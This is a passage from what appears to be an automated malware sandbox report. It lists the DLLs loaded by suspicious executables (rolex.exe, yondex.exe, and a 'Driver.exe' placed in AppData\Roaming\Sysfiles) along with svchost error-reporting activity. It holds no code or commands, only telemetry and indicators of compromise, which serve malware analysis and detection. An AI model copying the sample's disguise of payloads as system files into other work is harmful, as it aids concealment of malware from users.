                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeSection loaded: msasn1.dll
